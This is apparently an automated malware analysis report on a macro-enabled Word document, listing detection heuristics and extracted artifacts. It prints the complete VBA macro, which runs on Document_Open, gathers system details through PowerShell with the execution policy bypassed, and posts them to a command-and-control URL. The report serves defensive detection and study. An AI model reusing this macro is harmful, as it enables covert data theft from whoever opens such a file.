Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 97a1314f0d367aa0…

MALICIOUS

Office (OOXML) / .DOCX

17.8 KB Created: 2026-05-08 15:48:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2026-06-18
MD5: e68f933b31419304a00e6e29dd1cbc3f SHA-1: 3afdbfc76b070c9226227279a6d97ebc7fc41c93 SHA-256: 97a1314f0d367aa0a8c71d6695446ced4171b99dd155ab4dba487ba401fb6b4a
350 Risk Score

Heuristics 9

  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Dim shell As Object
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set shell = CreateObject("WScript.Shell")
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        osVersion = shell.Exec("powershell.exe -ExecutionPolicy Bypass -Command ""(Get-WmiObject Win32_OperatingSystem).Version""").StdOut.ReadLine
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
        Dim shell As Object
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set shell = CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://c2server.com/endpoint Referenced by macro
    • http://c2server.com/endpoint�Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.microsoft.com/office/2019/extlstReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2023/wordml/word16duReferenced by macro
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashReferenced by macro
    • http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlockReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1695 bytes
SHA-256: 03e495e57a9a6ffc50bfca0fd291900a810312b5f2dbc51e218d39c43a0f4bc6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    On Error Resume Next
    
    Dim shell As Object
    Dim http As Object
    Dim osVersion As String
    Dim osArchitecture As String
    Dim computerName As String
    Dim data As String
    Dim encodedData As String
    
    ' Execute PowerShell to gather system information
    Set shell = CreateObject("WScript.Shell")
    osVersion = shell.Exec("powershell.exe -ExecutionPolicy Bypass -Command ""(Get-WmiObject Win32_OperatingSystem).Version""").StdOut.ReadLine
    osArchitecture = shell.Exec("powershell.exe -ExecutionPolicy Bypass -Command ""(Get-WmiObject Win32_OperatingSystem).OSArchitecture""").StdOut.ReadLine
    computerName = shell.Exec("powershell.exe -ExecutionPolicy Bypass -Command ""(Get-WmiObject Win32_ComputerSystem).Name""").StdOut.ReadLine
    
    ' Format the data into URL-encoded form data
    data = "osVersion=" & osVersion & "&osArchitecture=" & osArchitecture & "&computerName=" & computerName
    encodedData = Replace(Replace(data, " ", "%20"), "&", "%26")
    
    ' Send the data to the C2 server using HTTP POST
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "POST", "http://c2server.com/endpoint", False
    http.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    http.send "data=" & encodedData
    
    ' Clean up
    Set shell = Nothing
    Set http = Nothing
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 9728 bytes
SHA-256: ba08a2f7038a937e89e37500dbf1bae56dbf01fd557e364785520c67ce290997

Open this report in the interactive analyzer, or submit your own file for analysis.